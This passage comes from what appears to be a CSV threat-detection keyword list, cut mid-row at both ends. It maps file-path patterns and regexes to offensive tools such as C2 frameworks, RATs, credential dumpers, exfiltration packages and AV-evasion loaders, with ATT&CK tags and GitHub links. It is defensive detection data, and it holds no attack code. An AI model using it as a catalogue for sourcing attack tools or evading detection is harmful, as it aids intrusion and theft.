TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\asm_CelestialSpark.x64.o*",".{0,1000}\\asm_CelestialSpark\.x64\.o.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*\AsmHell.asm*",".{0,1000}\\AsmHell\.asm.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*\ASPJinjaObfuscator*",".{0,1000}\\ASPJinjaObfuscator.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*\asreproasting.c*",".{0,1000}\\asreproasting\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*\AsyncRAT\*",".{0,1000}\\AsyncRAT\\.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*\ataDmargorP\:C*",".{0,1000}\\ataDmargorP\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\Athena-*.zip*",".{0,1000}\\Athena\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*\AtomLdr\x64*",".{0,1000}\\AtomLdr\\x64.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","0","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*\AttackerMITM.py*",".{0,1000}\\AttackerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\AtYourService.exe*",".{0,1000}\\AtYourService\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\audio\exfiltrator.py*",".{0,1000}\\audio\\exfiltrator\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\autodiscover\brute.go*",".{0,1000}\\autodiscover\\brute\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*\AutoRecon-main*",".{0,1000}\\AutoRecon\-main.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\AutoSmuggle\*.cs*",".{0,1000}\\AutoSmuggle\\.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*\autotimeline*",".{0,1000}\\autotimeline.{0,1000}","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","121","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*\avetdbg.txt*",".{0,1000}\\avetdbg\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*\avira\getCredsavira.h*",".{0,1000}\\avira\\getCredsavira\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\avira\getCredsavira2.h*",".{0,1000}\\avira\\getCredsavira2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\avred.py*",".{0,1000}\\avred\.py.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*\avred.py*",".{0,1000}\\avred\.py.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\avredweb.py *",".{0,1000}\\avredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*\AzureC2Proxy\*",".{0,1000}\\AzureC2Proxy\\.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*\AzureC2Relay*",".{0,1000}\\AzureC2Relay.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*\AzureHound.ps1*",".{0,1000}\\AzureHound\.ps1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\BabelStrike.py*",".{0,1000}\\BabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*\BabyShark-master.zip*",".{0,1000}\\BabyShark\-master\.zip.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*\backdoor.bat*",".{0,1000}\\backdoor\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\backdoor.exe*",".{0,1000}\\backdoor\.exe.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\backdoor\backdoor.mk*",".{0,1000}\\backdoor\\backdoor\.mk.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\backdoor\backdoor.project*",".{0,1000}\\backdoor\\backdoor\.project.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\backdoor_new.bat*",".{0,1000}\\backdoor_new\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\backdoored\*",".{0,1000}\\backdoored\\.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*\BackupCreds.csproj*",".{0,1000}\\BackupCreds\.csproj.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*\backupcreds.exe*",".{0,1000}\\backupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*\backupcreds.sln*",".{0,1000}\\backupcreds\.sln.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*\backupcreds\Program.cs*",".{0,1000}\\backupcreds\\Program\.cs.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*\BackupCreds-main*",".{0,1000}\\BackupCreds\-main.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*\BackupOperatorToDA*",".{0,1000}\\BackupOperatorToDA.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*\badrat.ps1*",".{0,1000}\\badrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\badrat_cs.exe*",".{0,1000}\\badrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\badrat_server.py*",".{0,1000}\\badrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\BadZure*",".{0,1000}\\BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*\basicKitten.exe*",".{0,1000}\\basicKitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*\beacon.exe*",".{0,1000}\\beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*\BeaconChannel.cs*",".{0,1000}\\BeaconChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\BeaconConnector.cs*",".{0,1000}\\BeaconConnector\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\beacon-in-go.exe*",".{0,1000}\\beacon\-in\-go\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*\beRoot.exe*",".{0,1000}\\beRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*\beRoot.zip*",".{0,1000}\\BeRoot.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*\beroot\modules\*.py*",".{0,1000}\\beroot\\modules\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*\BesoToken.cpp*",".{0,1000}\\BesoToken\.cpp.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*\BesoToken.exe*",".{0,1000}\\BesoToken\.exe.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*\BesoToken.vcxproj*",".{0,1000}\\BesoToken\.vcxproj.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*\BetterSafetyKatz.exe*",".{0,1000}\\BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\bgp_exfil.py*",".{0,1000}\\bgp_exfil\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\bh_owned.py*",".{0,1000}\\bh_owned\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\big_shell_pwd.7z*",".{0,1000}\\big_shell_pwd\.7z.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*\bin\cme.exe*",".{0,1000}\\bin\\cme\.exe.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\bin\shepard\*",".{0,1000}\\bin\\shepard\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\bin\uactoken.x86.o*",".{0,1000}\\bin\\uactoken\.x86\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\bin\uactoken2.x64.o*",".{0,1000}\\bin\\uactoken2\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\bin\wmiexec.x64.o*",".{0,1000}\\bin\\wmiexec\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\bin2hex.lua*",".{0,1000}\\bin2hex\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\bindshell.lua*",".{0,1000}\\bindshell\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with 